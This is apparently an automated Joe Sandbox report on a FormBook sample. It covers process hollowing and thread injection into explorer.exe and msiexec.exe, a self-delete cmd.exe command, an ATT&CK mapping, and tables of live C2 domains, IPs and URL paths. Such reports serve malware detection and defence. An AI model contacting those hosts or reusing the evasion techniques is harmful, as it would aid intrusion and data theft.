          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045C4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045C4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045B2ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045B2AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045BD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045BD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0459AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0459AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045BFAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045852A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045852A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045852A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\RCS76393.exe | Process token adjusted: Debug
Source: C:\Windows\SysWOW64\msiexec.exe | Process token adjusted: Debug

          HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Maps a DLL or memory area into another process
Source: C:\Users\user\Desktop\RCS76393.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\Desktop\RCS76393.exe | Section loaded: unknown target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and write
Source: C:\Users\user\Desktop\RCS76393.exe | Section loaded: unknown target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\user\Desktop\RCS76393.exe | Thread register set: target process: 3440
Source: C:\Windows\SysWOW64\msiexec.exe | Thread register set: target process: 3440
Queues an APC in another process (thread injection)
Source: C:\Users\user\Desktop\RCS76393.exe | Thread APC queued: target process: C:\Windows\explorer.exe
Sample uses process hollowing technique
Source: C:\Users\user\Desktop\RCS76393.exe | Section unmapped: C:\Windows\SysWOW64\msiexec.exe base address: 1A0000
Source: C:\Users\user\Desktop\RCS76393.exe | Process created: C:\Users\user\Desktop\RCS76393.exe 'C:\Users\user\Desktop\RCS76393.exe'
Source: C:\Windows\SysWOW64\msiexec.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\RCS76393.exe'
Source: explorer.exe, 00000005.00000000.338938773.0000000004F80000.00000004.00000001.sdmp | Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000005.00000000.329924999.0000000000EE0000.00000002.00000001.sdmp | Binary or memory string: Progman
Source: explorer.exe, 00000005.00000000.329924999.0000000000EE0000.00000002.00000001.sdmp | Binary or memory string: &Program Manager
Source: explorer.exe, 00000005.00000000.329924999.0000000000EE0000.00000002.00000001.sdmp | Binary or memory string: Progmanlock
Source: C:\Users\user\Desktop\RCS76393.exe | Code function: 2_2_0040B530 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

          Stealing of Sensitive Information:

Yara detected FormBook
Source: Yara match | File source: 00000003.00000001.324919242.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.587150105.0000000000480000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.362951284.0000000000D00000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.362449000.0000000000990000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.326066867.0000000003F40000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.587988322.00000000030A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.362232664.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.590270038.0000000004890000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 3.1.RCS76393.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.RCS76393.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.1.RCS76393.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.RCS76393.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Remote Access Functionality:

Yara detected FormBook
Source: Yara match | File source: 00000003.00000001.324919242.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.587150105.0000000000480000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.362951284.0000000000D00000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.362449000.0000000000990000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.326066867.0000000003F40000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.587988322.00000000030A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.362232664.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.590270038.0000000004890000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 3.1.RCS76393.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.RCS76393.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.1.RCS76393.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.RCS76393.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | Shared Modules1 | DLL Side-Loading1 | Process Injection512 | Virtualization/Sandbox Evasion2 | OS Credential Dumping | System Time Discovery1 | Remote Services | Archive Collected Data1 | Exfiltration Over Other Network Medium | Encrypted Channel1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | DLL Side-Loading1 | Process Injection512 | LSASS Memory | Security Software Discovery121 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Ingress Tool Transfer3 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Deobfuscate/Decode Files or Information1 | Security Account Manager | Virtualization/Sandbox Evasion2 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol3 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Obfuscated Files or Information4 | NTDS | Process Discovery2 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol13 | SIM Card Swap | Carrier Billing Fraud | -
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Software Packing13 | LSA Secrets | Remote System Discovery1 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings | -
Replication Through Removable Media | Launchd | Rc.common | Rc.common | DLL Side-Loading1 | Cached Domain Credentials | System Information Discovery12 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features | -

          Behavior Graph

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
Behavior Graph ID: 383936, Sample: RCS76393.exe, Startdate: 08/04/2021, Architecture: WINDOWS, Score: 100. The graph image is not reproduced here; its process tree and the signatures attached to each node are:

• Sample: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Found malware configuration; Malicious sample detected (through community Yara rule); 4 other signatures
• RCS76393.exe (started): Detected unpacking (changes PE section rights); Tries to detect virtualization through RDTSC time measurements
  • RCS76393.exe (started): Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; Queues an APC in another process (thread injection)
    • explorer.exe (injected): DNS/IP: www.foodsystemsjusticeproject.com; l.17986.net 104.160.174.177, 49723, 80 ST-BGPUS United States; 17 other IPs or domains. Signatures: System process connects to network (likely due to code injection or exploit); Performs DNS queries to domains with low reputation
      • msiexec.exe (started): Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
        • cmd.exe 1 (started)
          • conhost.exe (started)

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

Source | Detection | Scanner | Label
RCS76393.exe | 100% | Joe Sandbox ML | -

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

Source | Detection | Scanner | Label
3.1.RCS76393.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
7.2.msiexec.exe.4be7960.4.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
3.2.RCS76393.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen

          Domains

          No Antivirus matches

          URLs

Source | Detection | Scanner | Label
http://www.founder.com.cn/cn/bThe | 0% | URL Reputation | safe
www.batiktintaemas.com/goei/ | 100% | Avira URL Cloud | malware
http://www.tiro.com | 0% | URL Reputation | safe
http://www.goodfont.co.kr | 0% | URL Reputation | safe
http://www.carterandcone.coml | 0% | URL Reputation | safe
http://www.sajatypeworks.com | 0% | URL Reputation | safe
http://www.typography.netD | 0% | URL Reputation | safe
http://www.founder.com.cn/cn/cThe | 0% | URL Reputation | safe
http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe
http://fontfabrik.com | 0% | URL Reputation | safe
http://www.founder.com.cn/cn | 0% | URL Reputation | safe
http://www.jiyu-kobo.co.jp/ | 0% | URL Reputation | safe
http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe
http://www.sandoll.co.kr | 0% | URL Reputation | safe
http://www.urwpp.deDPlease | 0% | URL Reputation | safe
http://www.zhongyicts.com.cn | 0% | URL Reputation | safe
http://www.sakkal.com | 0% | URL Reputation | safe

          Domains and IPs

          Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
www.addthat.xyz | 199.59.242.153 | true | true | - | unknown
l.17986.net | 104.160.174.177 | true | true | - | unknown
batiktintaemas.com | 193.168.194.206 | true | true | - | unknown
www.ronwongart.com | 104.161.84.100 | true | true | - | unknown
ext-cust.squarespace.com | 198.185.159.144 | true | false | - | high
generalflix.com | 94.46.9.37 | true | true | - | unknown
natroredirect.natrocdn.com | 85.159.66.93 | true | true | - | unknown
foodsystemsjusticeproject.com | 34.102.136.180 | true | false | - | unknown
www.foodsystemsjusticeproject.com | unknown | unknown | true | - | unknown
www.batiktintaemas.com | unknown | unknown | true | - | unknown
www.libreo.club | unknown | unknown | true | - | unknown
www.breathharbour.net | unknown | unknown | true | - | unknown
www.generalflix.com | unknown | unknown | true | - | unknown
www.vbkulkarni.com | unknown | unknown | true | - | unknown
www.pimpmyrecipe.com | unknown | unknown | true | - | unknown
www.csgo-roll.net | unknown | unknown | true | - | unknown
www.evecrude.xyz | unknown | unknown | true | - | unknown
www.ly-iot.com | unknown | unknown | true | - | unknown

                                              Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
www.batiktintaemas.com/goei/ | true | Avira URL Cloud: malware | low

                                              URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://www.autoitscript.com/autoit3/J | explorer.exe, 00000005.00000000.329599785.000000000095C000.00000004.00000020.sdmp | false | - | high
http://www.apache.org/licenses/LICENSE-2.0 | explorer.exe, 00000005.00000000.347164157.000000000B1A6000.00000002.00000001.sdmp | false | - | high
http://www.fontbureau.com | explorer.exe, 00000005.00000000.347164157.000000000B1A6000.00000002.00000001.sdmp | false | - | high
http://www.fontbureau.com/designersG | explorer.exe, 00000005.00000000.347164157.000000000B1A6000.00000002.00000001.sdmp | false | - | high
http://www.fontbureau.com/designers/? | explorer.exe, 00000005.00000000.347164157.000000000B1A6000.00000002.00000001.sdmp | false | - | high
http://www.founder.com.cn/cn/bThe | explorer.exe, 00000005.00000000.347164157.000000000B1A6000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers? | explorer.exe, 00000005.00000000.347164157.000000000B1A6000.00000002.00000001.sdmp | false | - | high
http://www.tiro.com | explorer.exe, 00000005.00000000.347164157.000000000B1A6000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers | explorer.exe, 00000005.00000000.347164157.000000000B1A6000.00000002.00000001.sdmp | false | - | high
http://www.goodfont.co.kr | explorer.exe, 00000005.00000000.347164157.000000000B1A6000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.carterandcone.coml | explorer.exe, 00000005.00000000.347164157.000000000B1A6000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.sajatypeworks.com | explorer.exe, 00000005.00000000.347164157.000000000B1A6000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.typography.netD | explorer.exe, 00000005.00000000.347164157.000000000B1A6000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers/cabarga.htmlN | explorer.exe, 00000005.00000000.347164157.000000000B1A6000.00000002.00000001.sdmp | false | - | high
http://www.founder.com.cn/cn/cThe | explorer.exe, 00000005.00000000.347164157.000000000B1A6000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.galapagosdesign.com/staff/dennis.htm | explorer.exe, 00000005.00000000.347164157.000000000B1A6000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://fontfabrik.com | explorer.exe, 00000005.00000000.347164157.000000000B1A6000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.founder.com.cn/cn | explorer.exe, 00000005.00000000.347164157.000000000B1A6000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers/frere-jones.html | explorer.exe, 00000005.00000000.347164157.000000000B1A6000.00000002.00000001.sdmp | false | - | high
http://www.jiyu-kobo.co.jp/ | explorer.exe, 00000005.00000000.347164157.000000000B1A6000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.galapagosdesign.com/DPlease | explorer.exe, 00000005.00000000.347164157.000000000B1A6000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers8 | explorer.exe, 00000005.00000000.347164157.000000000B1A6000.00000002.00000001.sdmp | false | - | high
http://www.fonts.com | explorer.exe, 00000005.00000000.347164157.000000000B1A6000.00000002.00000001.sdmp | false | - | high
http://www.sandoll.co.kr | explorer.exe, 00000005.00000000.347164157.000000000B1A6000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.urwpp.deDPlease | explorer.exe, 00000005.00000000.347164157.000000000B1A6000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.zhongyicts.com.cn | explorer.exe, 00000005.00000000.347164157.000000000B1A6000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.sakkal.com | explorer.exe, 00000005.00000000.347164157.000000000B1A6000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown

                                                                    Contacted IPs

                                                                    Public

IP | Domain | Country | ASN | ASN Name | Malicious
104.161.84.100 | www.ronwongart.com | United States | 53755 | IOFLOODUS | true
94.46.9.37 | generalflix.com | Sweden | 200719 | MISSDOMAINSE | true
199.59.242.153 | www.addthat.xyz | United States | 395082 | BODIS-NJUS | true
198.185.159.144 | ext-cust.squarespace.com | United States | 53831 | SQUARESPACEUS | false
34.102.136.180 | foodsystemsjusticeproject.com | United States | 15169 | GOOGLEUS | false
193.168.194.206 | batiktintaemas.com | Germany | 47583 | AS-HOSTINGERLT | true
85.159.66.93 | natroredirect.natrocdn.com | Turkey | 34619 | CIZGITR | true
104.160.174.177 | l.17986.net | United States | 46844 | ST-BGPUS | true

                                                                    General Information

Joe Sandbox Version: 31.0.0 Emerald
Analysis ID: 383936
Start date: 08.04.2021
Start time: 12:45:00
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 9m 18s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: RCS76393.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 26
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.evad.winEXE@7/0@12/8
EGA Information: Failed
HDC Information:
• Successful, ratio: 30.7% (good quality ratio 27.9%)
• Quality average: 71.8%
• Quality standard deviation: 31.6%
HCA Information:
• Successful, ratio: 94%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .exe
Warnings:
                                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                                                                    • TCP Packets have been reduced to 100
                                                                    • Excluded IPs from analysis (whitelisted): 20.82.210.154, 13.64.90.137, 204.79.197.200, 13.107.21.200, 23.54.113.53, 40.88.32.150, 104.43.139.144, 52.255.188.83, 20.50.102.62, 23.10.249.43, 23.10.249.26, 23.0.174.200, 23.0.174.185, 52.155.217.156, 20.54.26.129, 95.100.54.203
                                                                    • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, arc.msn.com.nsatc.net, store-images.s-microsoft.com-c.edgekey.net, a1449.dscg2.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, e12564.dspb.akamaiedge.net, skypedataprdcoleus15.cloudapp.net, www-bing-com.dual-a-0001.a-msedge.net, audownload.windowsupdate.nsatc.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, consumerrp-displaycatalog-aks2eap.md.mp.microsoft.com.akadns.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, www.bing.com, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, skypedataprdcolwus17.cloudapp.net, fs.microsoft.com, dual-a-0001.a-msedge.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, ctldl.windowsupdate.com, e1723.g.akamaiedge.net, skypedataprdcolcus16.cloudapp.net, a767.dscg3.akamai.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                                                    • VT rate limit hit for: /opt/package/joesandbox/database/analysis/383936/sample/RCS76393.exe

                                                                    Simulations

                                                                    Behavior and APIs

                                                                    No simulations

                                                                    Joe Sandbox View / Context

                                                                    IPs

                                                                    Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
                                                                    94.46.9.37 | 46578-TR.exe | Get hash | malicious | Browse | www.generalflix.com/goei/?jBZx=D8b4q&kfOdRJ=J0lLVS/Rsi+YHyEfH1lEi6uDJp6jlcrDbJWYwp45E+lX6ClWTYpIvdMi/PcVRsXJUcC9
                                                                    199.59.242.153 | PaymentAdvice.exe | Get hash | malicious | Browse | www.sgdivergence.com/c22b/?GPi8=cbaAnqZg13PDvDAp4rbrvZjl753VAJ/hVAzUOls5TeU5Jx4pkABxsKYQ71wwJK0guSYZ&ary=tXLpzhFpgBj4m
                                                                     | 0BAdCQQVtP.exe | Get hash | malicious | Browse | www.mybodtonheart.com/bei3/?8p=EZa0cv&2d=yiVLv/mU1trn0FqDcpsMmhM8eVaNKk/wrW0n1zaKB+0dUktd9YtDHn8fCzOxundmeb0pk/R87Q==
                                                                     | RFQ_ V-21-Kiel-050-D02.xlsx | Get hash | malicious | Browse | www.krishnagiri.info/nsag/?MDK0g=hPHybZPWty89zdC7zz6D1Y5bPXZXETq0TT3iYhuvTaEiGqMWh7BB5kcULROPrIgmxQ/f1w==&UB=hR-4brtxaT5D4f3
                                                                     | New Order.exe | Get hash | malicious | Browse | www.friendsed.com/ditf/?KvZpwPd=7CjyIVchQZXwoSp1jc0tC17NVLbOMlIdjZlIPcHCPGe34LEeqGe9fWkqZA8O62TU4Lu3&ARn=BjAtCdjxOrQ8pTgP
                                                                     | ALPHA SCIENCE, INC.exe | Get hash | malicious | Browse | www.simplyhealrhcareplans.com/sqra/?Rl=n3U7aY9a5ujS+qWiRfdW0plv/0Nv8djS+qMboD1ih5qiP+MT365v99ebZUVRUFJkYzoK&_jqT2L=gBg8BF3ptlc
                                                                     | payment.exe | Get hash | malicious | Browse | www.mybodtonheart.com/bei3/?M4YDYvh=yiVLv/mU1trn0FqDcpsMmhM8eVaNKk/wrW0n1zaKB+0dUktd9YtDHn8fCzCIiGxmJdo4&Rl=M48tiJch
                                                                     | Order.exe | Get hash | malicious | Browse | www.getbacklink.net/cugi/?BlL=15D5Rlw69THVEJtjRVEnjixvCWz0IM/dTd5neGnMhVDDO36KfpjGt1+SA4NLCUy6JvG/&EZXpx6=tXExBh8PdJwpH
                                                                     | PaymentInvoice.exe | Get hash | malicious | Browse | www.sgdivergence.com/c22b/?9rgH70GX=cbaAnqZg13PDvDAp4rbrvZjl753VAJ/hVAzUOls5TeU5Jx4pkABxsKYQ72QgGrkYw3xe&LL0=X4XDHNl0z
                                                                     | SB210330034.pdf.exe | Get hash | malicious | Browse | www.tollisenschool.com/g7b/?8p=chLXzryXh&tL30J=IosHUe5U7sgPlvQ08qcmYS3dN02u+cj8WLYYiVwUOXtKG3qUsmBBVHLqljBtE+arhNut
                                                                     | swift_76567643.exe | Get hash | malicious | Browse | www.hicapitolize.com/m8es/?CVJ=sG6ecfng0YvqxX6BTfb7C0qDagoY2GDrv6xqwretuMrKP6q0Q4gvq6Z0725wPxuv0KtT&oX9=Txo8ntB0WBsp
                                                                     | Request an Estimate_2021_04_01.exe | Get hash | malicious | Browse | www.tollisenschool.com/g7b/?RzulnV=IosHUe5U7sgPlvQ08qcmYS3dN02u+cj8WLYYiVwUOXtKG3qUsmBBVHLqljBHbOqrlPmt&QL3=tTypTNm0gPD0F
                                                                     | 2021-04-01.exe | Get hash | malicious | Browse | www.tollisenschool.com/g7b/?o2=iL30VlAxs&8pntMJ6P=IosHUe5U7sgPlvQ08qcmYS3dN02u+cj8WLYYiVwUOXtKG3qUsmBBVHLqlghXUv6T7qPq
                                                                     | onbgX3WswF.exe | Get hash | malicious | Browse | www.sgdivergence.com/c22b/?w6=cbaAnqZg13PDvDAp4rbrvZjl753VAJ/hVAzUOls5TeU5Jx4pkABxsKYQ72QgGrkYw3xe&1b=W6O4DXSP5
                                                                     | ARBmDNJS7m.exe | Get hash | malicious | Browse | www.bootstrapexpress.com/aqu2/?rPj0Qr6=nYriP3GcRBwukkcsj3Cw6qOI4UbADI9fnlgfdFCApi4mXX+dpAaC8djN6XYIns7fxRpg&tXrx=gdkpfvSpm
                                                                     | Bista_094924,ppdf.exe | Get hash | malicious | Browse | www.simplyhealrhcareplans.com/sqra/?EBZ=ZTIti4FxbnDxH&YVMp8pfx=n3U7aY9a5ujS+qWiRfdW0plv/0Nv8djS+qMboD1ih5qiP+MT365v99ebZUVRUFJkYzoK
                                                                     | PO.1183.exe | Get hash | malicious | Browse | www.dentalenhancments.com/god/?XDKPxrlh=EnxYEfX2deexTb058Y7c97BLkeqRbsEiixp341UOoiLWyojMB+48BbQ1WdyM7J0osU9+&anM=LjfLu4hPXh18f
                                                                     | Scan-45679.exe | Get hash | malicious | Browse | www.wwwrigalinks.com/gwam/?Bjq=CXJcwEGd359wd7S74zzuJNqJGNLbtnXn+r8vDW7RCwie8OTRcmbQ6IgfXutP9/RkpDpW&Efzxz2=2dut_L3xNbOxThN
                                                                     | TT Remittance Copy.PDF.exe | Get hash | malicious | Browse | www.creditcorecard.com/ihmh/?wP9=1bJfls8sWvOO1f7Vh8wqJhCF9whiFTpEYoud4iYCKocbr8IRO//r9FkTIR4//YxGu1lm&lZQ=7nbLunBhP
                                                                     | DK Purchase Order 2021 - 00041.exe | Get hash | malicious | Browse | www.atualizacao.net/vsk9/?GFQH8=DklfZSbfSG8rWu2eKGFDH5WZs9/qq3j2XcYy6rNlSIz25CVNqPMMuncxEVlgc+oIXeWq&llsp=gTULpTwpERQd0J
                                                                     | 9tRIEZUd1j.exe | Get hash | malicious | Browse | www.bootstrapexpress.com/aqu2/?5j=nYriP3GcRBwukkcsj3Cw6qOI4UbADI9fnlgfdFCApi4mXX+dpAaC8djN6XYi4cLf1Thg&_P=2dhtaH9

                                                                    Domains

                                                                    Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
                                                                    l.17986.net | Spare Parts Request MV Accord 8.13.20_pdf.exe | Get hash | malicious | Browse | 64.32.28.253
                                                                    natroredirect.natrocdn.com | newordermx.exe | Get hash | malicious | Browse | 85.159.66.93
                                                                     | Swift001_jpg.exe | Get hash | malicious | Browse | 85.159.66.93
                                                                     | t3R3C0QGKU.exe | Get hash | malicious | Browse | 85.159.66.93
                                                                     | PO_210301.exe.exe | Get hash | malicious | Browse | 85.159.66.93
                                                                     | PO_210224.exe | Get hash | malicious | Browse | 85.159.66.93
                                                                     | VESSEL SPECIFICATION 2021.exe | Get hash | malicious | Browse | 85.159.66.93
                                                                     | SAMSUNG C&T UPCOMING PROJECTS19-027-MP-010203.exe.exe | Get hash | malicious | Browse | 85.159.66.93
                                                                     | Y75vU558UfuGbzM.exe | Get hash | malicious | Browse | 85.159.66.93
                                                                     | Doc_74657456348374.xlsx.exe | Get hash | malicious | Browse | 85.159.66.93
                                                                     | REQUEST FOR QUOTATION.exe | Get hash | malicious | Browse | 85.159.66.93
                                                                     | D0ck7nuQyqLXPRQ.exe | Get hash | malicious | Browse | 85.159.66.93
                                                                     | RFQ.exe | Get hash | malicious | Browse | 85.159.66.93
                                                                     | bz3xMPgqmD5nAxW.exe | Get hash | malicious | Browse | 85.159.66.93
                                                                     | kaExkIZiT6.exe | Get hash | malicious | Browse | 85.159.66.93
                                                                    ext-cust.squarespace.com | PO4308.exe | Get hash | malicious | Browse | 198.185.159.144
                                                                     | PO#41000055885.exe | Get hash | malicious | Browse | 198.49.23.144
                                                                     | SHIPPING DOCUMENTS.exe | Get hash | malicious | Browse | 198.185.159.144
                                                                     | invoice bank.xlsx | Get hash | malicious | Browse | 198.185.159.144
                                                                     | Y79FTQtEqG.exe | Get hash | malicious | Browse | 198.185.159.144
                                                                     | UAE MINISTRY OF HEALTH MEDICAL EQUIPMENT SUPPLY TENDER.exe | Get hash | malicious | Browse | 198.49.23.144
                                                                     | Scan copy 24032021_jpeg.exe | Get hash | malicious | Browse | 198.185.159.144
                                                                     | PO032321.exe | Get hash | malicious | Browse | 198.185.159.144
                                                                     | Copia De Pago_pdf.exe | Get hash | malicious | Browse | 198.49.23.145
                                                                     | V90Y4n0acH.exe | Get hash | malicious | Browse | 198.185.159.145
                                                                     | Dgm2Yseey2.exe | Get hash | malicious | Browse | 198.185.159.144
                                                                     | winlog.exe | Get hash | malicious | Browse | 198.185.159.144
                                                                     | payment slip_pdf.exe | Get hash | malicious | Browse | 198.185.159.144
                                                                     | wFzMy6hehS.exe | Get hash | malicious | Browse | 198.49.23.145
                                                                     | INCHAP_Invoice_21.xlsx | Get hash | malicious | Browse | 198.49.23.145
                                                                     | ffOWE185KP.exe | Get hash | malicious | Browse | 198.49.23.145
                                                                     | q9xB9DE3RA.exe | Get hash | malicious | Browse | 198.49.23.144
                                                                     | NdxPGuzTB9.exe | Get hash | malicious | Browse | 198.185.159.145
                                                                     | pfjgWtj6ms.exe | Get hash | malicious | Browse | 198.49.23.144
                                                                     | Order 8953-PDF.exe | Get hash | malicious | Browse | 198.49.23.144

                                                                    ASN

                                                                    Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
                                                                    IOFLOODUS | Betaling_advies.exe | Get hash | malicious | Browse | 107.178.109.19
                                                                     | Statement of Account.xlsx | Get hash | malicious | Browse | 23.226.65.187
                                                                     | Invoice.xlsx | Get hash | malicious | Browse | 23.226.65.187
                                                                     | MACHINE SPECIFICATION.exe | Get hash | malicious | Browse | 104.161.56.143
                                                                     | New Order.xlsx | Get hash | malicious | Browse | 104.161.29.174
